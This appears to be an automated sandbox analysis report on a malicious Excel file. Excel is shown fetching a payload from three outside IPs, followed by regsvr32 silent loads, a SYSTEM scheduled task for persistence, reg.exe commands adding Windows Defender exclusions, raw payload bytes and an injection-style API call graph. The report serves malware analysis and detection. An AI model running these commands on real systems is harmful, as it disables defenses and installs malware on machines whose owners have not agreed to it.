                Sep 24, 2021 17:27:14.937922955 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.937932968 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.937961102 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.937966108 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.938004017 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.938010931 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.938052893 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.938059092 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.938090086 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.938101053 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.938128948 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.938133001 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.938163996 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:27:14.938173056 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.938205004 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:27:14.940155029 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:28:06.374176025 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:28:06.374361038 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:28:18.872606993 CEST8049168111.90.148.104192.168.2.22
                Sep 24, 2021 17:28:18.872796059 CEST4916880192.168.2.22111.90.148.104
                Sep 24, 2021 17:28:19.937988043 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:28:19.938107967 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:28:57.652108908 CEST4916980192.168.2.2251.89.115.111
                Sep 24, 2021 17:28:57.652287006 CEST4916880192.168.2.22111.90.148.104
                Sep 24, 2021 17:28:57.652472019 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:28:57.672657967 CEST804916951.89.115.111192.168.2.22
                Sep 24, 2021 17:28:57.855547905 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:28:57.870100021 CEST8049168111.90.148.104192.168.2.22

                HTTP Request Dependency Graph

                • 190.14.37.173
                • 111.90.148.104
                • 51.89.115.111

                HTTP Packets

                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                0 | 192.168.2.22 | 49167 | 190.14.37.173 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Timestamp | kBytes transferred | Direction | Data
                Sep 24, 2021 17:26:57.963424921 CEST | 0 | OUT | GET /44463.7272820602.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 190.14.37.173
                Connection: Keep-Alive
                Sep 24, 2021 17:26:59.014862061 CEST | 1 | IN | HTTP/1.1 200 OK
                Server: nginx
                Date: Fri, 24 Sep 2021 15:26:58 GMT
                Content-Type: application/octet-stream
                Content-Length: 495616
                Connection: keep-alive
                X-Powered-By: PHP/5.4.16
                Accept-Ranges: bytes
                Expires: 0
                Cache-Control: no-cache, no-store, must-revalidate
                Content-Disposition: attachment; filename="44463.7272820602.dat"


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                1 | 192.168.2.22 | 49168 | 111.90.148.104 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Timestamp | kBytes transferred | Direction | Data
                Sep 24, 2021 17:27:01.562551975 CEST | 520 | OUT | GET /44463.7272820602.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 111.90.148.104
                Connection: Keep-Alive
                Sep 24, 2021 17:27:02.537890911 CEST | 522 | IN | HTTP/1.1 200 OK
                Server: nginx
                Date: Fri, 24 Sep 2021 15:27:03 GMT
                Content-Type: application/octet-stream
                Content-Length: 495616
                Connection: keep-alive
                X-Powered-By: PHP/5.4.16
                Accept-Ranges: bytes
                Expires: 0
                Cache-Control: no-cache, no-store, must-revalidate
                Content-Disposition: attachment; filename="44463.7272820602.dat"
                Data Ascii:
                Sep 24, 2021 17:27:02.538059950 CEST527INData Raw: 3b f0 74 1c 00 9f c8 5d 07 10 8b c6 2b c3 03 c8 8b c1 2b c3 83 ef 02 83 ff 02 8d 74 06 50 7f d9 0f b6 05 d5 5d 07 10 8b d9 0f af de 0f b6 35 cd 5d 07 10 69 db 93 6c 01 00 8d 3c 30 81 ff c4 00 00 00 a0 78 5d 07 10 89 0d d8 5d 07 10 75 1e 0f b6 f0
                Data Ascii: ;t]++tP]5]il<0x]]u+fl$+a]*T$U]]PIu++a]*T$U]]5]+U;wT]];va-t]+
                Sep 24, 2021 17:27:02.538098097 CEST528INData Raw: 07 10 80 c2 55 00 15 d7 5d 07 10 83 c3 50 81 7c 24 24 c4 00 00 00 75 1d 8b 15 c4 5d 07 10 03 d2 8b f2 2b 35 74 5d 07 10 2b f1 83 c6 61 89 35 74 5d 07 10 eb 23 0f b6 05 74 5d 07 10 8b 35 74 5d 07 10 2a c1 04 55 00 05 d7 5d 07 10 83 05 c4 5d 07 10
                Data Ascii: U]P|$$u]+5t]+a5t]#t]5t]*U]]Px]9]r]5t]*(]x]T$(s+T$(T$f|$]+v 5]u]*]*x]ax]];wT]]
                Sep 24, 2021 17:27:02.538125992 CEST529INData Raw: 07 10 2a d3 80 c2 61 83 c4 04 a3 d8 5d 07 10 88 15 78 5d 07 10 84 28 0b 67 8b 35 c4 5d 07 10 66 0f b6 3d d2 5d 07 10 8b cb 2b ce 83 c1 03 0f b7 c9 66 3b f9 89 4c 24 10 77 0c 0f b7 c9 a2 cc 5d 07 10 8d 5c 01 0a 8d 8c 1e bd 3f 00 00 0f b7 c9 89 4c
                Data Ascii: *a]x](g5]f=]+f;L$w]\?L$f$=];t%]++\Px]]]=
                Sep 24, 2021 17:27:02.538163900 CEST530INData Raw: 5d 07 10 3b c7 74 27 0f b6 86 c8 5d 07 10 2b d8 0f b7 fd 8b c3 2b c7 0f b6 f9 83 c0 61 3b c7 a3 d8 5d 07 10 74 08 83 c6 01 83 fe 32 7c ce 5f 5e 5d 0f b6 c2 5b 83 c4 20 c3 cc cc cc 53 55 8b 6c 24 0c 56 8b f0 8b 4e 18 83 f9 08 8d 5e 04 72 04 8b 03
                Data Ascii: ];t']++a;]t2|_^][ SUl$VN^r=iw7rVP=ivri+QV^][F+;v(;swvMW~_t;FrNU+hiPJR1~~r
                Sep 24, 2021 17:27:02.538203001 CEST531INData Raw: 66 c7 04 58 00 00 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 8b 75 08 83 7e 18 08 72 0c 8b 56 04 52 e8 ae 09 00 00 83 c4 04 33 c0 50 c7 46 18 07 00 00 00 89 46 14 50 66 89 46 04 e8 cc 0d 00 00 cc cc cc cc cc cc cc cc cc cc cc cc
                Data Ascii: fXMdY_^[]u~rVR3PFFPfFw3RT3s$PL$D$hh8L$QD$oD$VP^% %%%$Uuuuu
                Sep 24, 2021 17:27:02.734069109 CEST533INData Raw: 0b ff 71 14 56 e8 bd fc ff ff eb 29 80 7c 24 0c 00 74 18 83 fe 10 73 13 8b 41 14 3b f0 73 02 8b c6 50 6a 01 e8 53 fc ff ff eb 0a 85 f6 75 06 56 e8 2b fc ff ff 33 c0 3b c6 1b c0 f7 d8 5e c2 08 00 56 ff 74 24 08 8b f1 e8 a1 fe ff ff c7 06 c4 a1 02
                Data Ascii: qV)|$tsA;sPjSuV+3;^Vt$^US]VW}G;s+EE;EsE;uEjPSjFjuCt8rNrFFuWQPuz_^[]UV
                Sep 24, 2021 17:27:02.754579067 CEST534INData Raw: 01 74 07 56 e8 5d ff ff ff 59 8b c6 5e c2 04 00 8b 44 24 04 83 c1 09 51 83 c0 09 50 e8 6d 14 00 00 f7 d8 59 1b c0 59 40 c2 04 00 56 6a 01 68 8c 50 07 10 8b f1 e8 f5 fc ff ff c7 06 a0 a1 02 10 8b c6 5e c3 55 8b ec 83 ec 0c eb 0d ff 75 08 e8 f6 15
                Data Ascii: tV]Y^D$QPmYY@VjhP^UuYtunYtL^@^uL^h!YVMhh8EPEUQESVWWjPu3V>LVj


                Session ID:2
                Source IP:192.168.2.22
                Source Port:49169
                Destination IP:51.89.115.111
                Destination Port:80
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

                Timestamp:Sep 24, 2021 17:27:13.975816965 CEST
                kBytes transferred:1046
                Direction:OUT
                Data:GET /44463.7272820602.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 51.89.115.111
                Connection: Keep-Alive
                Timestamp:Sep 24, 2021 17:27:14.178706884 CEST
                kBytes transferred:1048
                Direction:IN
                Data:HTTP/1.1 200 OK
                Server: nginx
                Date: Fri, 24 Sep 2021 15:27:14 GMT
                Content-Type: application/octet-stream
                Content-Length: 495616
                Connection: keep-alive
                X-Powered-By: PHP/5.4.16
                Accept-Ranges: bytes
                Expires: 0
                Cache-Control: no-cache, no-store, must-revalidate
                Content-Disposition: attachment; filename="44463.7272820602.dat"


                Code Manipulations

                Statistics

                CPU Usage

                Memory Usage

                High Level Behavior Distribution

                Behavior

                System Behavior

                General

                Start time:17:27:14
                Start date:24/09/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13f860000
                File size:28253536 bytes
                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                General

                Start time:17:27:34
                Start date:24/09/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 -silent ..\Fiosa.der
                Imagebase:0xff5a0000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:17:27:34
                Start date:24/09/2021
                Path:C:\Windows\SysWOW64\regsvr32.exe
                Wow64 process (32bit):true
                Commandline: -silent ..\Fiosa.der
                Imagebase:0xe50000
                File size:14848 bytes
                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                General

                Start time:17:28:00
                Start date:24/09/2021
                Path:C:\Windows\SysWOW64\explorer.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\explorer.exe
                Imagebase:0x4b0000
                File size:2972672 bytes
                MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:17:28:01
                Start date:24/09/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 -silent ..\Fiosa1.der
                Imagebase:0xff5a0000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:17:28:02
                Start date:24/09/2021
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn kxizfug /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 17:30 /ET 17:42
                Imagebase:0x7c0000
                File size:179712 bytes
                MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:17:28:02
                Start date:24/09/2021
                Path:C:\Windows\SysWOW64\regsvr32.exe
                Wow64 process (32bit):true
                Commandline: -silent ..\Fiosa1.der
                Imagebase:0xf50000
                File size:14848 bytes
                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                General

                Start time:17:28:05
                Start date:24/09/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32.exe -s 'C:\Users\user\Fiosa.der'
                Imagebase:0xff5a0000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:17:28:05
                Start date:24/09/2021
                Path:C:\Windows\SysWOW64\regsvr32.exe
                Wow64 process (32bit):true
                Commandline: -s 'C:\Users\user\Fiosa.der'
                Imagebase:0xf50000
                File size:14848 bytes
                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                General

                Start time:17:28:26
                Start date:24/09/2021
                Path:C:\Windows\SysWOW64\explorer.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\explorer.exe
                Imagebase:0x4b0000
                File size:2972672 bytes
                MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:17:28:27
                Start date:24/09/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 -silent ..\Fiosa2.der
                Imagebase:0xff5a0000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:17:28:27
                Start date:24/09/2021
                Path:C:\Windows\SysWOW64\regsvr32.exe
                Wow64 process (32bit):true
                Commandline: -silent ..\Fiosa2.der
                Imagebase:0xf50000
                File size:14848 bytes
                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                General

                Start time:17:28:29
                Start date:24/09/2021
                Path:C:\Windows\SysWOW64\explorer.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\explorer.exe
                Imagebase:0x4b0000
                File size:2972672 bytes
                MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                General

                Start time:17:28:32
                Start date:24/09/2021
                Path:C:\Windows\System32\reg.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Autiufytlfbb' /d '0'
                Imagebase:0xff370000
                File size:74752 bytes
                MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                General

                Start time:17:28:34
                Start date:24/09/2021
                Path:C:\Windows\System32\reg.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Nweouxwwcjwu' /d '0'
                Imagebase:0xffb90000
                File size:74752 bytes
                MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                General

                Start time:17:28:51
                Start date:24/09/2021
                Path:C:\Windows\SysWOW64\explorer.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\explorer.exe
                Imagebase:0x4b0000
                File size:2972672 bytes
                MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                General

                Start time:17:30:00
                Start date:24/09/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32.exe -s 'C:\Users\user\Fiosa.der'
                Imagebase:0xff9c0000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                General

                Start time:17:30:00
                Start date:24/09/2021
                Path:C:\Windows\SysWOW64\regsvr32.exe
                Wow64 process (32bit):true
                Commandline: -s 'C:\Users\user\Fiosa.der'
                Imagebase:0x490000
                File size:14848 bytes
                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                Disassembly

                Code Analysis

                  Execution Graph

                  Execution Coverage:5.7%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:8.6%
                  Total number of Nodes:1362
                  Total number of Limit Nodes:25

                  Graph

100095e1 HeapAlloc 11516->11517 11518 1000c55f 11517->11518 11552 100092e5 11518->11552 11521 100085d5 2 API calls 11522 1000c587 11521->11522 11523 100092e5 2 API calls 11522->11523 11524 1000c5aa LoadLibraryW 11523->11524 11526 1000c5d5 11524->11526 11527 1000c5e3 11524->11527 11528 1000e171 3 API calls 11526->11528 11529 1000861a 2 API calls 11527->11529 11528->11527 11530 1000c5f8 memset 11529->11530 11530->11512 11531 1000c619 11530->11531 11532 1000861a 2 API calls 11531->11532 11533 1000c625 11532->11533 11533->11512 11535 1000c6f4 11534->11535 11536 1000c715 NtCreateSection 11535->11536 11551 1000c880 11535->11551 11537 1000c73e RegisterClassExA 11536->11537 11536->11551 11538 1000c790 CreateWindowExA 11537->11538 11539 1000c7cc GetCurrentProcess NtMapViewOfSection 11537->11539 11538->11539 11544 1000c7ba DestroyWindow UnregisterClassA 11538->11544 11545 1000c7f7 NtMapViewOfSection 11539->11545 11539->11551 11540 1000c8d2 GetCurrentProcess NtUnmapViewOfSection 11541 1000c8e5 11540->11541 11542 1000c8f8 11541->11542 11543 1000c8ed NtClose 11541->11543 11542->11488 11542->11492 11543->11542 11544->11539 11546 1000c81e 11545->11546 11545->11551 11547 10008669 HeapAlloc 11546->11547 11548 1000c82e 11547->11548 11549 1000c839 VirtualAllocEx WriteProcessMemory 11548->11549 11548->11551 11550 1000861a 2 API calls 11549->11550 11550->11551 11551->11540 11551->11541 11554 100092f7 11552->11554 11558 10008604 HeapAlloc 11554->11558 11555 10009333 11555->11521 11556 10009316 11556->11555 11557 10009322 lstrcatW 11556->11557 11557->11556 11558->11556 11679 10008604 HeapAlloc 11559->11679 11561 10009b6d 11562 10005c45 11561->11562 11680 1000b5f6 11561->11680 11562->11302 11562->11303 11598 1000fb19 11562->11598 11565 100095c7 HeapAlloc 11566 10009bb0 11565->11566 11567 10009ceb 11566->11567 11572 10009bdc 11566->11572 11568 10009d3c 11567->11568 11569 10009cfd 11567->11569 11570 10009292 2 API calls 11568->11570 11571 10009ce7 11569->11571 11573 10009292 2 API calls 
11569->11573 11570->11571 11574 100085c2 2 API calls 11571->11574 11572->11571 11690 10009292 11572->11690 11573->11571 11576 10009d5c 11574->11576 11577 1000861a 2 API calls 11576->11577 11585 10009db2 11576->11585 11578 10009d9b memset 11577->11578 11580 1000861a 2 API calls 11578->11580 11580->11585 11581 100095e1 HeapAlloc 11582 10009c3f 11581->11582 11583 100092e5 2 API calls 11582->11583 11586 10009c51 11583->11586 11584 10009292 2 API calls 11590 10009cc8 11584->11590 11585->11585 11587 1000861a 2 API calls 11585->11587 11588 100085d5 2 API calls 11586->11588 11587->11562 11589 10009c5f 11588->11589 11696 10009256 11589->11696 11591 1000861a 2 API calls 11590->11591 11591->11571 11594 1000861a 2 API calls 11595 10009c96 11594->11595 11596 1000861a 2 API calls 11595->11596 11597 10009ca1 11596->11597 11597->11584 11704 10008604 HeapAlloc 11598->11704 11600 1000fb20 11601 1000fb2a 11600->11601 11705 1000a6a9 11600->11705 11601->11303 11604 1000fb6e 11604->11303 11606 1000fb55 11607 1000f8cc 15 API calls 11606->11607 11608 1000fb6b 11607->11608 11608->11303 11610 1000a86d 5 API calls 11609->11610 11611 10005d9a 11610->11611 11612 10005974 8 API calls 11611->11612 11614 10005c6e 11611->11614 11613 10005dd4 11612->11613 11613->11614 11737 10009ebb 11613->11737 11614->11307 11614->11308 11617 10005de6 lstrcmpiW 11617->11614 11619 1000a86d 5 API calls 11618->11619 11620 1000598d 11619->11620 11621 1000599a 11620->11621 11622 10009292 2 API calls 11620->11622 11623 100059bd 11622->11623 11761 1000590c 11623->11761 11625 100059cd 11626 100059f1 11625->11626 11629 1000590c 2 API calls 11625->11629 11627 1000861a 2 API calls 11626->11627 11628 100059fd 11627->11628 11630 10005bc4 11628->11630 11629->11626 11631 10009ebb 3 API calls 11630->11631 11632 10005bce 11631->11632 11633 10005bd7 11632->11633 11634 10005bdc lstrcmpiW 11632->11634 11633->11320 11635 10005bf2 11634->11635 11636 10005c14 11634->11636 11766 10009f6c 11635->11766 11637 1000861a 2 API calls 
11636->11637 11637->11633 11809 10008604 HeapAlloc 11641->11809 11643 10005b11 11644 10005b24 GetDriveTypeW 11643->11644 11645 10005b55 11643->11645 11644->11645 11810 10005a7b 11645->11810 11647 10005b71 11648 10005ba1 11647->11648 11827 10004d6d 11647->11827 11913 1000a39e 11648->11913 11652 1000a39e 2 API calls 11653 10005bbd 11652->11653 11653->11309 11655 1000109a HeapAlloc 11654->11655 11656 1000f8db 11655->11656 12414 100061b4 memset 11656->12414 11659 100085d5 2 API calls 11660 1000f901 11659->11660 11674 1000f978 11660->11674 12426 10009e66 11660->12426 11664 1000f92c 11665 1000109a HeapAlloc 11664->11665 11664->11674 11666 1000f93e 11665->11666 11667 10009640 2 API calls 11666->11667 11668 1000f94d 11667->11668 11669 1000a911 2 API calls 11668->11669 11670 1000f95e 11669->11670 11671 1000f96c 11670->11671 12432 1000a239 11670->12432 11673 1000861a 2 API calls 11671->11673 11673->11674 11674->11320 11676 10005a73 11675->11676 12440 10005631 11676->12440 11679->11561 11681 1000b60f 11680->11681 11682 1001242d _ftol2_sse 11681->11682 11683 1000b61f 11682->11683 11684 100095c7 HeapAlloc 11683->11684 11685 1000b62e 11684->11685 11686 1000b66a 11685->11686 11689 1001242d _ftol2_sse 11685->11689 11687 100085c2 2 API calls 11686->11687 11688 10009b91 11687->11688 11688->11565 11689->11685 11691 100092a4 11690->11691 11702 10008604 HeapAlloc 11691->11702 11693 100092c1 11694 100092cd lstrcatA 11693->11694 11695 100092de 11693->11695 11694->11693 11695->11576 11695->11581 11695->11597 11697 1000928c 11696->11697 11698 1000925f 11696->11698 11697->11594 11703 10008604 HeapAlloc 11698->11703 11700 10009271 11700->11697 11701 10009279 MultiByteToWideChar 11700->11701 11701->11697 11702->11693 11703->11700 11704->11600 11706 1000a6c2 11705->11706 11710 1000a6bb 11705->11710 11709 1000a6f0 11706->11709 11706->11710 11732 10008604 HeapAlloc 11706->11732 11708 1000861a 2 API calls 11708->11710 11709->11708 11709->11710 11710->11604 11711 1000f9bf 11710->11711 11733 
10008604 HeapAlloc 11711->11733 11713 1000f9d2 11718 1000fb10 11713->11718 11731 1000fabc 11713->11731 11734 1000109a 11713->11734 11716 1000861a 2 API calls 11716->11718 11717 100095e1 HeapAlloc 11719 1000fa2c 11717->11719 11718->11606 11720 100092e5 2 API calls 11719->11720 11721 1000fa49 11720->11721 11722 1000a6a9 3 API calls 11721->11722 11723 1000fa56 11722->11723 11724 100085d5 2 API calls 11723->11724 11725 1000fa62 11724->11725 11726 100085d5 2 API calls 11725->11726 11728 1000fa6b 11726->11728 11727 1000861a 2 API calls 11729 1000fab1 11727->11729 11728->11727 11730 1000861a 2 API calls 11729->11730 11730->11731 11731->11716 11732->11709 11733->11713 11735 10008531 HeapAlloc 11734->11735 11736 100010b5 11735->11736 11736->11717 11740 10009f95 11737->11740 11741 10009fbe 11740->11741 11752 10009b0e 11741->11752 11743 10005de2 11743->11614 11743->11617 11744 10009fc9 11744->11743 11755 1000be9b 11744->11755 11746 1000a095 11747 1000861a 2 API calls 11746->11747 11747->11743 11748 1000a070 11750 1000861a 2 API calls 11748->11750 11749 10009ffd 11749->11746 11749->11748 11751 10008669 HeapAlloc 11749->11751 11750->11746 11751->11748 11759 10008604 HeapAlloc 11752->11759 11754 10009b1a 11754->11744 11756 1000bec1 11755->11756 11758 1000bec5 11756->11758 11760 10008604 HeapAlloc 11756->11760 11758->11749 11759->11754 11760->11758 11762 1000591c 11761->11762 11765 10005917 11761->11765 11763 10005934 GetLastError 11762->11763 11764 1000593f GetLastError 11762->11764 11763->11765 11764->11765 11765->11625 11767 10009f7c 11766->11767 11782 1000a0ab 11767->11782 11770 1000b1b1 SetFileAttributesW memset 11771 1000b1ec 11770->11771 11772 1001242d _ftol2_sse 11771->11772 11781 1000b1ff 11771->11781 11773 1000b21b 11772->11773 11774 10009640 2 API calls 11773->11774 11775 1000b22c 11774->11775 11776 100092e5 2 API calls 11775->11776 11777 1000b23d 11776->11777 11777->11781 11797 1000b0de 11777->11797 11780 1000861a 2 API calls 11780->11781 11781->11636 11783 1000a0c8 
11782->11783 11787 10005c08 11782->11787 11784 1001242d _ftol2_sse 11783->11784 11783->11787 11785 1000a112 11784->11785 11796 10008604 HeapAlloc 11785->11796 11787->11636 11787->11770 11788 1000a126 11788->11787 11789 100122d3 _ftol2_sse 11788->11789 11790 1000a168 11789->11790 11791 10009b0e HeapAlloc 11790->11791 11794 1000a1b4 11791->11794 11792 1000a21e 11793 1000861a 2 API calls 11792->11793 11793->11787 11794->11792 11795 1000861a 2 API calls 11794->11795 11795->11792 11796->11788 11798 1000b101 11797->11798 11799 1000b109 memset 11798->11799 11808 1000b178 11798->11808 11800 100095e1 HeapAlloc 11799->11800 11801 1000b125 11800->11801 11802 1001242d _ftol2_sse 11801->11802 11803 1000b141 11802->11803 11804 10009640 2 API calls 11803->11804 11805 1000b157 11804->11805 11806 100085d5 2 API calls 11805->11806 11807 1000b160 MoveFileW 11806->11807 11807->11808 11808->11780 11809->11643 11921 10001080 11810->11921 11815 100085c2 2 API calls 11817 10005ab7 11815->11817 11816 10005af7 11816->11647 11817->11816 11818 10001080 HeapAlloc 11817->11818 11819 10005ac5 11818->11819 11931 10008910 11819->11931 11822 10005ae1 11824 100085c2 2 API calls 11822->11824 11825 10005aeb 11824->11825 11826 1000861a 2 API calls 11825->11826 11826->11816 11828 10004d91 11827->11828 11829 10004de7 11827->11829 11831 100095c7 HeapAlloc 11828->11831 11830 1000b7a8 10 API calls 11829->11830 11881 10004e1d 11829->11881 11832 10004dfc 11830->11832 11833 10004d9b 11831->11833 11834 1000a86d 5 API calls 11832->11834 11835 100095c7 HeapAlloc 11833->11835 11836 10004e08 11834->11836 11837 10004dab 11835->11837 12027 1000a471 11836->12027 11837->11829 11840 10004db9 GetModuleHandleA 11837->11840 11839 10004e14 11843 1000e1bc 6 API calls 11839->11843 11839->11881 11841 10004dc6 GetModuleHandleA 11840->11841 11842 10004dcd 11840->11842 11841->11842 11845 100085c2 2 API calls 11842->11845 11844 10004e37 11843->11844 11846 100095e1 HeapAlloc 11844->11846 11847 10004dde 11845->11847 11848 10004e48 
11846->11848 11849 100085c2 2 API calls 11847->11849 11850 100092e5 2 API calls 11848->11850 11849->11829 11851 10004e60 11850->11851 11852 100085d5 2 API calls 11851->11852 11854 10004e73 11852->11854 11853 10004e9c 11856 1000861a 2 API calls 11853->11856 11854->11853 12032 1000896f 11854->12032 11858 10004ead 11856->11858 11857 10004e8f 11857->11853 11860 1000a2e3 6 API calls 11857->11860 12052 10004a0b memset 11858->12052 11860->11853 11863 100095e1 HeapAlloc 11865 100051fd 11863->11865 11866 100092e5 2 API calls 11865->11866 11872 10005215 11866->11872 11867 10005245 11869 100085d5 2 API calls 11867->11869 11868 1000e2c6 42 API calls 11870 10004f64 11868->11870 11871 10005251 lstrcpynW lstrcpynW 11869->11871 11873 10004fb3 11870->11873 11878 10005082 11870->11878 11906 100051f1 11870->11906 11874 10005296 11871->11874 11872->11867 11875 1000861a 2 API calls 11872->11875 11880 10004fbc 11873->11880 11873->11906 11876 1000861a 2 API calls 11874->11876 11875->11867 11877 100052a8 11876->11877 11879 1000861a 2 API calls 11877->11879 11878->11906 12126 1000fc1f 11878->12126 11879->11881 12121 10008604 HeapAlloc 11880->12121 11881->11648 11884 10005006 11884->11881 11887 100095e1 HeapAlloc 11884->11887 11889 1000501f 11887->11889 11888 10005110 11892 1000109a HeapAlloc 11888->11892 11888->11906 11890 10009640 2 API calls 11889->11890 11891 10005052 11890->11891 11893 100085d5 2 API calls 11891->11893 11894 10005129 11892->11894 11895 1000505c 11893->11895 11896 1000902d _ftol2_sse 11894->11896 12122 1000a911 memset 11895->12122 11898 1000514b 11896->11898 12137 100060df 11898->12137 